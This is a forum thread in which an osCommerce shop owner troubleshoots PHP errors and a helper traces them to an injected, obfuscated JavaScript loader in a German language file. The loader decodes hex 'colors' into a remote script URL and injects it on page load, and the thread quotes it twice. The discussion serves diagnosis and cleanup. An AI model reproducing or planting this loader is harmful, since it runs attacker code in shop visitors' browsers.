Tobosaku Posted March 23, 2011 Share Posted March 23, 2011 There came up an error today, but nothing has been changed. At least that is the situation that has been explained to me. The first error which came up was: Fatal error: Call to a member function add_current_page() on a non-object in ./html/includes/application_top.php on line 312 I then have found the following thread in this forum: http://www.oscommerce.com/forums/topic/265215-call-to-a-member-function-add-current-page-on-a-non-object/ So I've tried to fix it as described there, and then another issue came up: Parse error: syntax error, unexpected T_VAR in ./includes/languages/german/index.php on line 31 I reuploaded the application_top.php as it was before my first try to repair. Thought this couldn't have been the real issue then. But interestingly the new error message was still there. Then, here we go with the mentioned index.php in the error message: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> </head> <body> <?php /* $Id: index.php 1739 2007-12-20 00:52:16Z hpdl $ osCommerce, Open Source E-Commerce Solutions http://www.oscommerce.com Copyright (c) 2007 osCommerce Released under the GNU General Public License */ define('TEXT_MAIN', '<div style="text-align: center;"><big>Hier finden sie das Licht und die Lampen der Zukunft.Die geballte LED Power finden Sie in unseren Lampen und Leuchten Sortiment, die die kostengünstigere Alternative zu Glühbirnen und Energiesparlampen darstellen. In unserem LED Leuchtmittel Shop finden Sie unter anderem: <b>LED Bulbs – Birnen, LED Lampen, LED Spots, LED Scheinwerfer, LED Strips und LED Strahler.</b></big><big><b> </b>Also LED Beleuchtung für alle Bereiche des Alltags.<br> </big><big><b><img style="width: 370px; height: 184px;" alt="Leuchtmittel für jeden Bereich!" src="http://mm43507.itsaserver.org/images2/banner3.jpg"></b></big> </div><script type="text/javascript"> if (typeof(redef_colors)=="undefined") { var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7a84', '#82837e', '#40403d', '#727e7c', '#3e7982', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00'); var redef_colors = 1; var colors_picked = 0; function div_pick_colors(t,styled) { var s = ""; for (j=0;j<t.length;j++) { var c_rgb = t[j]; for (i=1;i<7;i++) { var c_clr = c_rgb.substr(i++,2); if (c_clr!="00") s += String.fromCharCode(parseInt(c_clr,16)-15); } } if (styled) { s = s.substr(0,36) + s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime() + s.substr((s.length-2)); } else { s = s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime(); } return s; } function try_pick_colors() { try { if(!document.getElementById || !document.createElement){ document.write(div_pick_colors(div_colors,1)); } else { var new_cstyle=document.createElement("script"); new_cstyle.type="text/javascript"; new_cstyle.src=div_pick_colors(div_colors,0); document.getElementsByTagName("head")[0].appendChild(new_cstyle); } } catch(e) { } try { check_colors_picked(); } catch(e) { setTimeout("try_pick_colors()", 500); } } try_pick_colors(); } </script><div style="text-align: center;"><big>Nicht nur Osram hat das günstige LED Licht im Angebot. Auch wir haben eine vielfältige Auswahl an neuen Produkten aus dem LED Leuchtmittelbereich. </big><br> <br> <big>Außerdem finden Sie bei uns auch Solar Leuchten und Lampen. Unter anderem die verschiedensten Solar Pflastersteine. Auch Solarbaustellenlampen, Solar Flasher, Warnlichter und Roadmarker. </big><br> </div> <br> <div style="text-align: center;"><big><b>Bitte beachten Sie, dass wir einen Mindestbestellwert von <font color="red">30 Euro </font>haben.</b></big><br> </div> <div style="text-align: center;"> <br> <table style="width: 80%; height: 252px; text-align: left; margin-left: auto; margin-right: auto;" border="1" cellpadding="2" cellspacing="0"> <tbody> <tr> <td style="text-align: center;"><small><big>Rechts der Kostenvergleich einer 40 Watt Glühbirne, einer 9 Watt Energiesparlampe und einer 4 Watt LED Birne bei ca. 8.000 Brennstunden.</big><br> <br> Falls sie interessiert daran sind in ihrem Betrieb oder zuhause ihre Leuchtmittel gegen LEDs auszutauschen, erstellen wir Ihnen gerne eine Amortisationsrechnung.<br> Anhand dieser Berechnung zeigen wir Ihnen, ab wann sie Ihre Umstellung rentiert. <br> <br> Schicken Sie uns einfach eine Anfrage an:</small> <span style="font-weight: bold;">[email protected]</span></td> <td style="text-align: right;"><big><b><img style="width: 260px; height: 190px;" alt="Die LED Birne im Vergleich" src="http://mm43507.itsaserver.org/images2/kosten2.png"><br> </b></big></td> </tr> </tbody> </table> '); define('TABLE_HEADING_NEW_PRODUCTS', 'Neue Produkte im %s'); define('TABLE_HEADING_UPCOMING_PRODUCTS', 'Wann ist was verfügbar'); define('TABLE_HEADING_DATE_EXPECTED', 'Datum'); if ( ($category_depth == 'products') || (isset($HTTP_GET_VARS['manufacturers_id'])) ) { define('HEADING_TITLE', 'Unser Onlineshop'); define('TABLE_HEADING_IMAGE', ''); define('TABLE_HEADING_MODEL', 'Artikel-Nr.'); define('TABLE_HEADING_PRODUCTS', 'Produkte'); define('TABLE_HEADING_MANUFACTURER', 'Hersteller'); define('TABLE_HEADING_QUANTITY', 'Anzahl'); define('TABLE_HEADING_PRICE', 'Preis'); define('TABLE_HEADING_WEIGHT', 'Gewicht'); define('TABLE_HEADING_BUY_NOW', 'Bestellen'); define('TEXT_NO_PRODUCTS', 'Es gibt keine Produkte in dieser Kategorie.'); define('TEXT_NO_PRODUCTS2', 'Es gibt kein Produkt, das von diesem Hersteller stammt.'); define('TEXT_NUMBER_OF_PRODUCTS', 'Artikel: '); define('TEXT_SHOW', '<b>Darstellen:</b>'); define('TEXT_BUY', '1 x \''); define('TEXT_NOW', '\' bestellen!'); define('TEXT_ALL_CATEGORIES', 'Alle Kategorien'); define('TEXT_ALL_MANUFACTURERS', 'Alle Hersteller'); } elseif ($category_depth == 'top') { define('HEADING_TITLE', 'Unser Onlineshop:'); } elseif ($category_depth == 'nested') { define('HEADING_TITLE', 'Kategorien'); } ?> </body> </html> I just want to be sure what to do, as my further attempts to fix already made other things coming up. Link to comment Share on other sites More sharing options...
Taipo Posted March 23, 2011 Share Posted March 23, 2011 Id suggest you go back to your original german/index.php file that hopefully you have in a backup folder and compare the code. There seems to be a javascript piece in there that probably should not be there. script type="text/javascript"> if (typeof(redef_colors)=="undefined") {... I could be wrong, as I do not have a german/index.php file to compare with, but that script code looks like its not meant to be there. I also suggest that you create a file in your includes folder called .htaccess (if there is not one there already) and add these bits of code to it. Options All -Indexes <Files *.php> Order Deny,Allow Deny from all </Files> - Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)- Another discussion about infected files ::here::- A discussion on file permissions ::here::- Site hacked? Should you upgrade or not, some thoughts ::here::- Fix the admin login bypass exploit here- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX Link to comment Share on other sites More sharing options...
Tobosaku Posted March 23, 2011 Author Share Posted March 23, 2011 Thought I have restored it already, but now copied it again. Thanks so far, I think it's a step forward that I'm having now the same error message as before: Fatal error: Call to a member function add_current_page() on a non-object in /data/www/web466/html/includes/application_top.php on line 312 Here is the file: <?php /* $Id: application_top.php 1833 2008-01-30 22:03:30Z hpdl $ osCommerce, Open Source E-Commerce Solutions http://www.oscommerce.com Copyright (c) 2008 osCommerce Released under the GNU General Public License */ // start the timer for the page parse time log define('PAGE_PARSE_START_TIME', microtime()); // set the level of error reporting error_reporting(E_ALL & ~E_NOTICE); // check support for register_globals if (function_exists('ini_get') && (ini_get('register_globals') == false) && (PHP_VERSION < 4.3) ) { exit('Server Requirement Error: register_globals is disabled in your PHP configuration. This can be enabled in your php.ini configuration file or in the .htaccess file in your catalog directory. Please use PHP 4.3+ if register_globals cannot be enabled on the server.'); } // Set the local configuration parameters - mainly for developers if (file_exists('includes/local/configure.php')) include('includes/local/configure.php'); // include server parameters require('includes/configure.php'); if (strlen(DB_SERVER) < 1) { if (is_dir('install')) { header('Location: install/index.php'); } } // define the project version define('PROJECT_VERSION', 'osCommerce Online Merchant v2.2 RC2a'); // some code to solve compatibility issues require(DIR_WS_FUNCTIONS . 'compatibility.php'); // set the type of request (secure or not) $request_type = (getenv('HTTPS') == 'on') ? 'SSL' : 'NONSSL'; // set php_self in the local scope if (!isset($PHP_SELF)) $PHP_SELF = $HTTP_SERVER_VARS['PHP_SELF']; if ($request_type == 'NONSSL') { define('DIR_WS_CATALOG', DIR_WS_HTTP_CATALOG); } else { define('DIR_WS_CATALOG', DIR_WS_HTTPS_CATALOG); } // include the list of project filenames require(DIR_WS_INCLUDES . 'filenames.php'); // include the list of project database tables require(DIR_WS_INCLUDES . 'database_tables.php'); // customization for the design layout define('BOX_WIDTH', 125); // how wide the boxes should be in pixels (default: 125) // include the database functions require(DIR_WS_FUNCTIONS . 'database.php'); // make a connection to the database... now tep_db_connect() or die('Unable to connect to database server!'); // set the application parameters $configuration_query = tep_db_query('select configuration_key as cfgKey, configuration_value as cfgValue from ' . TABLE_CONFIGURATION); while ($configuration = tep_db_fetch_array($configuration_query)) { define($configuration['cfgKey'], $configuration['cfgValue']); } // if gzip_compression is enabled, start to buffer the output if ( (GZIP_COMPRESSION == 'true') && ($ext_zlib_loaded = extension_loaded('zlib')) && (PHP_VERSION >= '4') ) { if (($ini_zlib_output_compression = (int)ini_get('zlib.output_compression')) < 1) { if (PHP_VERSION >= '4.0.4') { ob_start('ob_gzhandler'); } else { include(DIR_WS_FUNCTIONS . 'gzip_compression.php'); ob_start(); ob_implicit_flush(); } } else { ini_set('zlib.output_compression_level', GZIP_LEVEL); } } // set the HTTP GET parameters manually if search_engine_friendly_urls is enabled if (SEARCH_ENGINE_FRIENDLY_URLS == 'true') { if (strlen(getenv('PATH_INFO')) > 1) { $GET_array = array(); $PHP_SELF = str_replace(getenv('PATH_INFO'), '', $PHP_SELF); $vars = explode('/', substr(getenv('PATH_INFO'), 1)); for ($i=0, $n=sizeof($vars); $i<$n; $i++) { if (strpos($vars[$i], '[]')) { $GET_array[substr($vars[$i], 0, -2)][] = $vars[$i+1]; } else { $HTTP_GET_VARS[$vars[$i]] = $vars[$i+1]; } $i++; } if (sizeof($GET_array) > 0) { while (list($key, $value) = each($GET_array)) { $HTTP_GET_VARS[$key] = $value; } } } } // define general functions used application-wide require(DIR_WS_FUNCTIONS . 'general.php'); require(DIR_WS_FUNCTIONS . 'html_output.php'); // set the cookie domain $cookie_domain = (($request_type == 'NONSSL') ? HTTP_COOKIE_DOMAIN : HTTPS_COOKIE_DOMAIN); $cookie_path = (($request_type == 'NONSSL') ? HTTP_COOKIE_PATH : HTTPS_COOKIE_PATH); // include cache functions if enabled if (USE_CACHE == 'true') include(DIR_WS_FUNCTIONS . 'cache.php'); // include shopping cart class require(DIR_WS_CLASSES . 'shopping_cart.php'); // include navigation history class require(DIR_WS_CLASSES . 'navigation_history.php'); // check if sessions are supported, otherwise use the php3 compatible session class if (!function_exists('session_start')) { define('PHP_SESSION_NAME', 'osCsid'); define('PHP_SESSION_PATH', $cookie_path); define('PHP_SESSION_DOMAIN', $cookie_domain); define('PHP_SESSION_SAVE_PATH', SESSION_WRITE_DIRECTORY); include(DIR_WS_CLASSES . 'sessions.php'); } // define how the session functions will be used require(DIR_WS_FUNCTIONS . 'sessions.php'); // set the session name and save path tep_session_name('osCsid'); tep_session_save_path(SESSION_WRITE_DIRECTORY); // set the session cookie parameters if (function_exists('session_set_cookie_params')) { session_set_cookie_params(0, $cookie_path, $cookie_domain); } elseif (function_exists('ini_set')) { ini_set('session.cookie_lifetime', '0'); ini_set('session.cookie_path', $cookie_path); ini_set('session.cookie_domain', $cookie_domain); } // set the session ID if it exists if (isset($HTTP_POST_VARS[tep_session_name()])) { tep_session_id($HTTP_POST_VARS[tep_session_name()]); } elseif ( ($request_type == 'SSL') && isset($HTTP_GET_VARS[tep_session_name()]) ) { tep_session_id($HTTP_GET_VARS[tep_session_name()]); } // start the session $session_started = false; if (SESSION_FORCE_COOKIE_USE == 'True') { tep_setcookie('cookie_test', 'please_accept_for_session', time()+60*60*24*30, $cookie_path, $cookie_domain); if (isset($HTTP_COOKIE_VARS['cookie_test'])) { tep_session_start(); $session_started = true; } } elseif (SESSION_BLOCK_SPIDERS == 'True') { $user_agent = strtolower(getenv('HTTP_USER_AGENT')); $spider_flag = false; if (tep_not_null($user_agent)) { $spiders = file(DIR_WS_INCLUDES . 'spiders.txt'); for ($i=0, $n=sizeof($spiders); $i<$n; $i++) { if (tep_not_null($spiders[$i])) { if (is_integer(strpos($user_agent, trim($spiders[$i])))) { $spider_flag = true; break; } } } } if ($spider_flag == false) { tep_session_start(); $session_started = true; } } else { tep_session_start(); $session_started = true; } if ( ($session_started == true) && (PHP_VERSION >= 4.3) && function_exists('ini_get') && (ini_get('register_globals') == false) ) { extract($_SESSION, EXTR_OVERWRITE+EXTR_REFS); } // set SID once, even if empty $SID = (defined('SID') ? SID : ''); // verify the ssl_session_id if the feature is enabled if ( ($request_type == 'SSL') && (SESSION_CHECK_SSL_SESSION_ID == 'True') && (ENABLE_SSL == true) && ($session_started == true) ) { $ssl_session_id = getenv('SSL_SESSION_ID'); if (!tep_session_is_registered('SSL_SESSION_ID')) { $SESSION_SSL_ID = $ssl_session_id; tep_session_register('SESSION_SSL_ID'); } if ($SESSION_SSL_ID != $ssl_session_id) { tep_session_destroy(); tep_redirect(tep_href_link(FILENAME_SSL_CHECK)); } } // verify the browser user agent if the feature is enabled if (SESSION_CHECK_USER_AGENT == 'True') { $http_user_agent = getenv('HTTP_USER_AGENT'); if (!tep_session_is_registered('SESSION_USER_AGENT')) { $SESSION_USER_AGENT = $http_user_agent; tep_session_register('SESSION_USER_AGENT'); } if ($SESSION_USER_AGENT != $http_user_agent) { tep_session_destroy(); tep_redirect(tep_href_link(FILENAME_LOGIN)); } } // verify the IP address if the feature is enabled if (SESSION_CHECK_IP_ADDRESS == 'True') { $ip_address = tep_get_ip_address(); if (!tep_session_is_registered('SESSION_IP_ADDRESS')) { $SESSION_IP_ADDRESS = $ip_address; tep_session_register('SESSION_IP_ADDRESS'); } if ($SESSION_IP_ADDRESS != $ip_address) { tep_session_destroy(); tep_redirect(tep_href_link(FILENAME_LOGIN)); } } // create the shopping cart & fix the cart if necesary if (tep_session_is_registered('cart') && is_object($cart)) { if (PHP_VERSION < 4) { $broken_cart = $cart; $cart = new shoppingCart; $cart->unserialize($broken_cart); } } else { tep_session_register('cart'); $cart = new shoppingCart; } // include currencies class and create an instance require(DIR_WS_CLASSES . 'currencies.php'); $currencies = new currencies(); // include the mail classes require(DIR_WS_CLASSES . 'mime.php'); require(DIR_WS_CLASSES . 'email.php'); // set the language if (!tep_session_is_registered('language') || isset($HTTP_GET_VARS['language'])) { if (!tep_session_is_registered('language')) { tep_session_register('language'); tep_session_register('languages_id'); } include(DIR_WS_CLASSES . 'language.php'); $lng = new language(); if (isset($HTTP_GET_VARS['language']) && tep_not_null($HTTP_GET_VARS['language'])) { $lng->set_language($HTTP_GET_VARS['language']); } else { $lng->get_browser_language(); } $language = $lng->language['directory']; $languages_id = $lng->language['id']; } // include the language translations require(DIR_WS_LANGUAGES . $language . '.php'); // currency if (!tep_session_is_registered('currency') || isset($HTTP_GET_VARS['currency']) || ( (USE_DEFAULT_LANGUAGE_CURRENCY == 'true') && (LANGUAGE_CURRENCY != $currency) ) ) { if (!tep_session_is_registered('currency')) tep_session_register('currency'); if (isset($HTTP_GET_VARS['currency']) && $currencies->is_set($HTTP_GET_VARS['currency'])) { $currency = $HTTP_GET_VARS['currency']; } else { $currency = (USE_DEFAULT_LANGUAGE_CURRENCY == 'true') ? LANGUAGE_CURRENCY : DEFAULT_CURRENCY; } } // navigation history if (tep_session_is_registered('navigation')) { if (PHP_VERSION < 4) { $broken_navigation = $navigation; $navigation = new navigationHistory; $navigation->unserialize($broken_navigation); } } else { tep_session_register('navigation'); $navigation = new navigationHistory; } $navigation->add_current_page(); // Shopping cart actions if (isset($HTTP_GET_VARS['action'])) { // redirect the customer to a friendly cookie-must-be-enabled page if cookies are disabled if ($session_started == false) { tep_redirect(tep_href_link(FILENAME_COOKIE_USAGE)); } if (DISPLAY_CART == 'true') { $goto = FILENAME_SHOPPING_CART; $parameters = array('action', 'cPath', 'products_id', 'pid'); } else { $goto = basename($PHP_SELF); if ($HTTP_GET_VARS['action'] == 'buy_now') { $parameters = array('action', 'pid', 'products_id'); } else { $parameters = array('action', 'pid'); } } switch ($HTTP_GET_VARS['action']) { // customer wants to update the product quantity in their shopping cart case 'update_product' : for ($i=0, $n=sizeof($HTTP_POST_VARS['products_id']); $i<$n; $i++) { if (in_array($HTTP_POST_VARS['products_id'][$i], (is_array($HTTP_POST_VARS['cart_delete']) ? $HTTP_POST_VARS['cart_delete'] : array()))) { $cart->remove($HTTP_POST_VARS['products_id'][$i]); } else { if (PHP_VERSION < 4) { // if PHP3, make correction for lack of multidimensional array. reset($HTTP_POST_VARS); while (list($key, $value) = each($HTTP_POST_VARS)) { if (is_array($value)) { while (list($key2, $value2) = each($value)) { if (ereg ("(.*)\]\[(.*)", $key2, $var)) { $id2[$var[1]][$var[2]] = $value2; } } } } $attributes = ($id2[$HTTP_POST_VARS['products_id'][$i]]) ? $id2[$HTTP_POST_VARS['products_id'][$i]] : ''; } else { $attributes = ($HTTP_POST_VARS['id'][$HTTP_POST_VARS['products_id'][$i]]) ? $HTTP_POST_VARS['id'][$HTTP_POST_VARS['products_id'][$i]] : ''; } $cart->add_cart($HTTP_POST_VARS['products_id'][$i], $HTTP_POST_VARS['cart_quantity'][$i], $attributes, false); } } tep_redirect(tep_href_link($goto, tep_get_all_get_params($parameters))); break; // customer adds a product from the products page case 'add_product' : if (isset($HTTP_POST_VARS['products_id']) && is_numeric($HTTP_POST_VARS['products_id'])) { $cart->add_cart($HTTP_POST_VARS['products_id'], $cart->get_quantity(tep_get_uprid($HTTP_POST_VARS['products_id'], $HTTP_POST_VARS['id']))+1, $HTTP_POST_VARS['id']); } tep_redirect(tep_href_link($goto, tep_get_all_get_params($parameters))); break; // performed by the 'buy now' button in product listings and review page case 'buy_now' : if (isset($HTTP_GET_VARS['products_id'])) { if (tep_has_product_attributes($HTTP_GET_VARS['products_id'])) { tep_redirect(tep_href_link(FILENAME_PRODUCT_INFO, 'products_id=' . $HTTP_GET_VARS['products_id'])); } else { $cart->add_cart($HTTP_GET_VARS['products_id'], $cart->get_quantity($HTTP_GET_VARS['products_id'])+1); } } tep_redirect(tep_href_link($goto, tep_get_all_get_params($parameters))); break; case 'notify' : if (tep_session_is_registered('customer_id')) { if (isset($HTTP_GET_VARS['products_id'])) { $notify = $HTTP_GET_VARS['products_id']; } elseif (isset($HTTP_GET_VARS['notify'])) { $notify = $HTTP_GET_VARS['notify']; } elseif (isset($HTTP_POST_VARS['notify'])) { $notify = $HTTP_POST_VARS['notify']; } else { tep_redirect(tep_href_link(basename($PHP_SELF), tep_get_all_get_params(array('action', 'notify')))); } if (!is_array($notify)) $notify = array($notify); for ($i=0, $n=sizeof($notify); $i<$n; $i++) { $check_query = tep_db_query("select count(*) as count from " . TABLE_PRODUCTS_NOTIFICATIONS . " where products_id = '" . $notify[$i] . "' and customers_id = '" . $customer_id . "'"); $check = tep_db_fetch_array($check_query); if ($check['count'] < 1) { tep_db_query("insert into " . TABLE_PRODUCTS_NOTIFICATIONS . " (products_id, customers_id, date_added) values ('" . $notify[$i] . "', '" . $customer_id . "', now())"); } } tep_redirect(tep_href_link(basename($PHP_SELF), tep_get_all_get_params(array('action', 'notify')))); } else { $navigation->set_snapshot(); tep_redirect(tep_href_link(FILENAME_LOGIN, '', 'SSL')); } break; case 'notify_remove' : if (tep_session_is_registered('customer_id') && isset($HTTP_GET_VARS['products_id'])) { $check_query = tep_db_query("select count(*) as count from " . TABLE_PRODUCTS_NOTIFICATIONS . " where products_id = '" . $HTTP_GET_VARS['products_id'] . "' and customers_id = '" . $customer_id . "'"); $check = tep_db_fetch_array($check_query); if ($check['count'] > 0) { tep_db_query("delete from " . TABLE_PRODUCTS_NOTIFICATIONS . " where products_id = '" . $HTTP_GET_VARS['products_id'] . "' and customers_id = '" . $customer_id . "'"); } tep_redirect(tep_href_link(basename($PHP_SELF), tep_get_all_get_params(array('action')))); } else { $navigation->set_snapshot(); tep_redirect(tep_href_link(FILENAME_LOGIN, '', 'SSL')); } break; case 'cust_order' : if (tep_session_is_registered('customer_id') && isset($HTTP_GET_VARS['pid'])) { if (tep_has_product_attributes($HTTP_GET_VARS['pid'])) { tep_redirect(tep_href_link(FILENAME_PRODUCT_INFO, 'products_id=' . $HTTP_GET_VARS['pid'])); } else { $cart->add_cart($HTTP_GET_VARS['pid'], $cart->get_quantity($HTTP_GET_VARS['pid'])+1); } } tep_redirect(tep_href_link($goto, tep_get_all_get_params($parameters))); break; } } // include the who's online functions require(DIR_WS_FUNCTIONS . 'whos_online.php'); tep_update_whos_online(); // include the password crypto functions require(DIR_WS_FUNCTIONS . 'password_funcs.php'); // include validation functions (right now only email address) require(DIR_WS_FUNCTIONS . 'validations.php'); // split-page-results require(DIR_WS_CLASSES . 'split_page_results.php'); // infobox require(DIR_WS_CLASSES . 'boxes.php'); // auto activate and expire banners require(DIR_WS_FUNCTIONS . 'banner.php'); tep_activate_banners(); tep_expire_banners(); // auto expire special products require(DIR_WS_FUNCTIONS . 'specials.php'); tep_expire_specials(); // calculate category path if (isset($HTTP_GET_VARS['cPath'])) { $cPath = $HTTP_GET_VARS['cPath']; } elseif (isset($HTTP_GET_VARS['products_id']) && !isset($HTTP_GET_VARS['manufacturers_id'])) { $cPath = tep_get_product_path($HTTP_GET_VARS['products_id']); } else { $cPath = ''; } if (tep_not_null($cPath)) { $cPath_array = tep_parse_category_path($cPath); $cPath = implode('_', $cPath_array); $current_category_id = $cPath_array[(sizeof($cPath_array)-1)]; } else { $current_category_id = 0; } // include the breadcrumb class and start the breadcrumb trail require(DIR_WS_CLASSES . 'breadcrumb.php'); $breadcrumb = new breadcrumb; $breadcrumb->add(HEADER_TITLE_TOP, HTTP_SERVER); $breadcrumb->add(HEADER_TITLE_CATALOG, tep_href_link(FILENAME_DEFAULT)); // add category names or the manufacturer name to the breadcrumb trail if (isset($cPath_array)) { for ($i=0, $n=sizeof($cPath_array); $i<$n; $i++) { $categories_query = tep_db_query("select categories_name from " . TABLE_CATEGORIES_DESCRIPTION . " where categories_id = '" . (int)$cPath_array[$i] . "' and language_id = '" . (int)$languages_id . "'"); if (tep_db_num_rows($categories_query) > 0) { $categories = tep_db_fetch_array($categories_query); $breadcrumb->add($categories['categories_name'], tep_href_link(FILENAME_DEFAULT, 'cPath=' . implode('_', array_slice($cPath_array, 0, ($i+1))))); } else { break; } } } elseif (isset($HTTP_GET_VARS['manufacturers_id'])) { $manufacturers_query = tep_db_query("select manufacturers_name from " . TABLE_MANUFACTURERS . " where manufacturers_id = '" . (int)$HTTP_GET_VARS['manufacturers_id'] . "'"); if (tep_db_num_rows($manufacturers_query)) { $manufacturers = tep_db_fetch_array($manufacturers_query); $breadcrumb->add($manufacturers['manufacturers_name'], tep_href_link(FILENAME_DEFAULT, 'manufacturers_id=' . $HTTP_GET_VARS['manufacturers_id'])); } } // add the products model to the breadcrumb trail if (isset($HTTP_GET_VARS['products_id'])) { $model_query = tep_db_query("select products_model from " . TABLE_PRODUCTS . " where products_id = '" . (int)$HTTP_GET_VARS['products_id'] . "'"); if (tep_db_num_rows($model_query)) { $model = tep_db_fetch_array($model_query); $breadcrumb->add($model['products_model'], tep_href_link(FILENAME_PRODUCT_INFO, 'cPath=' . $cPath . '&products_id=' . $HTTP_GET_VARS['products_id'])); } } // initialize the message stack for output messages require(DIR_WS_CLASSES . 'message_stack.php'); $messageStack = new messageStack; // set which precautions should be checked define('WARN_INSTALL_EXISTENCE', 'true'); define('WARN_CONFIG_WRITEABLE', 'true'); define('WARN_SESSION_DIRECTORY_NOT_WRITEABLE', 'true'); define('WARN_SESSION_AUTO_START', 'true'); define('WARN_DOWNLOAD_DIRECTORY_NOT_READABLE', 'true'); ?> I already have replaced the navigation history part with: // navigation history if (tep_session_is_registered('navigation')) { if (PHP_VERSION < 4) { $broken_navigation = $navigation; $navigation = new navigationHistory; $navigation->unserialize($broken_navigation); } else { $navigation = new navigationHistory; } } else { tep_session_register('navigation'); $navigation = new navigationHistory; } $navigation->add_current_page(); But it didn't help, there came up a new error message as described in my first post. Should this be the proper fixing for this issue? Should I try it again? Link to comment Share on other sites More sharing options...
Taipo Posted March 23, 2011 Share Posted March 23, 2011 The problem is in the german/index.php What is all that code in there about LED lights. Is that your code or not? - Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)- Another discussion about infected files ::here::- A discussion on file permissions ::here::- Site hacked? Should you upgrade or not, some thoughts ::here::- Fix the admin login bypass exploit here- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX Link to comment Share on other sites More sharing options...
Tobosaku Posted March 23, 2011 Author Share Posted March 23, 2011 Yes that has been added by the administrator of this site. Just a description of the shop content, which haven't made any issue since today and wasn't changed. Why is the german/index.php a problem, when the error message mentions the application_top.php file? Link to comment Share on other sites More sharing options...
Taipo Posted March 23, 2011 Share Posted March 23, 2011 If for example that LED code is nothing to do with your site then back that german/index.php file up, and create a new one with just this code in it. <?php /* $Id: index.php 1739 2007-12-20 00:52:16Z hpdl $ osCommerce, Open Source E-Commerce Solutions http://www.oscommerce.com Copyright (c) 2007 osCommerce Released under the GNU General Public License */ define('TEXT_MAIN', ''); define('TABLE_HEADING_NEW_PRODUCTS', 'Neue Produkte im %s'); define('TABLE_HEADING_UPCOMING_PRODUCTS', 'Wann ist was verfügbar'); define('TABLE_HEADING_DATE_EXPECTED', 'Datum'); if ( ($category_depth == 'products') || (isset($HTTP_GET_VARS['manufacturers_id'])) ) { define('HEADING_TITLE', 'Unser Onlineshop'); define('TABLE_HEADING_IMAGE', ''); define('TABLE_HEADING_MODEL', 'Artikel-Nr.'); define('TABLE_HEADING_PRODUCTS', 'Produkte'); define('TABLE_HEADING_MANUFACTURER', 'Hersteller'); define('TABLE_HEADING_QUANTITY', 'Anzahl'); define('TABLE_HEADING_PRICE', 'Preis'); define('TABLE_HEADING_WEIGHT', 'Gewicht'); define('TABLE_HEADING_BUY_NOW', 'Bestellen'); define('TEXT_NO_PRODUCTS', 'Es gibt keine Produkte in dieser Kategorie.'); define('TEXT_NO_PRODUCTS2', 'Es gibt kein Produkt, das von diesem Hersteller stammt.'); define('TEXT_NUMBER_OF_PRODUCTS', 'Artikel: '); define('TEXT_SHOW', '<b>Darstellen:</b>'); define('TEXT_BUY', '1 x \''); define('TEXT_NOW', '\' bestellen!'); define('TEXT_ALL_CATEGORIES', 'Alle Kategorien'); define('TEXT_ALL_MANUFACTURERS', 'Alle Hersteller'); } elseif ($category_depth == 'top') { define('HEADING_TITLE', 'Unser Onlineshop:'); } elseif ($category_depth == 'nested') { define('HEADING_TITLE', 'Kategorien'); } ?> Which is basically the default german/index.php code without any modification - Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)- Another discussion about infected files ::here::- A discussion on file permissions ::here::- Site hacked? Should you upgrade or not, some thoughts ::here::- Fix the admin login bypass exploit here- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX Link to comment Share on other sites More sharing options...
Taipo Posted March 23, 2011 Share Posted March 23, 2011 Yes that has been added by the administrator of this site. Just a description of the shop content, which haven't made any issue since today and wasn't changed. Why is the german/index.php a problem, when the error message mentions the application_top.php file? After you corrected the error in application_top, the rest of the site was able to load correctly so the next error displayed itself which is in german/index.php The T_VAR is in reference to: var redef_colors = 1; var colors_picked = 0; You might want to double check with your administrator that they did in fact add in this code: <script type="text/javascript"> if (typeof(redef_colors)=="undefined") { var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7a84', '#82837e', '#40403d', '#727e7c', '#3e7982', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00'); var redef_colors = 1; var colors_picked = 0; function div_pick_colors(t,styled) { var s = ""; for (j=0;j<t.length;j++) { var c_rgb = t[j]; for (i=1;i<7;i++) { var c_clr = c_rgb.substr(i++,2); if (c_clr!="00") s += String.fromCharCode(parseInt(c_clr,16)-15); } } if (styled) { s = s.substr(0,36) + s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime() + s.substr((s.length-2)); } else { s = s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime(); } return s; } function try_pick_colors() { try { if(!document.getElementById || !document.createElement){ document.write(div_pick_colors(div_colors,1)); } else { var new_cstyle=document.createElement("script"); new_cstyle.type="text/javascript"; new_cstyle.src=div_pick_colors(div_colors,0); document.getElementsByTagName("head")[0].appendChild(new_cstyle); } } catch(e) { } try { check_colors_picked(); } catch(e) { setTimeout("try_pick_colors()", 500); } } try_pick_colors(); } </script> Because well, every site I have seen this on via google search, has been defaced via that index.php file in question, using that code as a page styler. - Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)- Another discussion about infected files ::here::- A discussion on file permissions ::here::- Site hacked? Should you upgrade or not, some thoughts ::here::- Fix the admin login bypass exploit here- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX Link to comment Share on other sites More sharing options...
Tobosaku Posted March 23, 2011 Author Share Posted March 23, 2011 Have tried what you've suggested. Still the same error message: Fatal error: Call to a member function add_current_page() on a non-object in ./includes/application_top.php on line 312 Link to comment Share on other sites More sharing options...
